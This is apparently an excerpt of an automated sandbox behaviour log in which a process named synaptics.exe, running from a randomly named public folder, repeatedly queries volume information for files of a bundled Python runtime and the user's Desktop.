Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc.20820000 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\requests VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\requests\__pycache__\__init__.cpython-310.pyc.15559880 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\warnings.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\warnings.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\warnings.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\warnings.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\warnings.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\warnings.cpython-310.pyc.20610944 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\site-packages\urllib3\__pycache__\__init__.cpython-310.pyc.15559640 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__future__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__future__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__future__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__future__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__future__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\__future__.cpython-310.pyc.29217664 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\logging VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\logging\__pycache__\__init__.cpython-310.pyc.29187672 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\re.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\re.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\re.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\re.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\re.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\re.cpython-310.pyc.20740104 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\enum.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\enum.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\enum.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\enum.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\enum.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\enum.cpython-310.pyc.20773048 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\types.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\types.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\types.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\types.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\types.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\types.cpython-310.pyc.29216896 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\sre_compile.cpython-310.pyc.29220352 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\sre_parse.cpython-310.pyc.30504288 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\sre_constants.cpython-310.pyc.30491176 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\functools.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\functools.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\functools.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\functools.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\functools.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\functools.cpython-310.pyc.30504576 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\collections\__pycache__\__init__.cpython-310.pyc.30529912 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\keyword.cpython-310.pyc.30504672 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\operator.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\operator.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\operator.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\operator.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\operator.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\operator.cpython-310.pyc.30650400 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\reprlib.cpython-310.pyc.30814432 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\copyreg.cpython-310.pyc.30814432 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\traceback.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\traceback.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\traceback.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\traceback.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\traceback.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\traceback.cpython-310.pyc.30814720 VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\DLLs VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\linecache.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\linecache.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\linecache.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\linecache.py VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\VIP4YmtQLN\synaptics.exe	Queries volume information: C:\Users\Public\VIP4YmtQLN\Lib\__pycache__\linecache.cpython-310.pyc.30815776 VolumeInformation
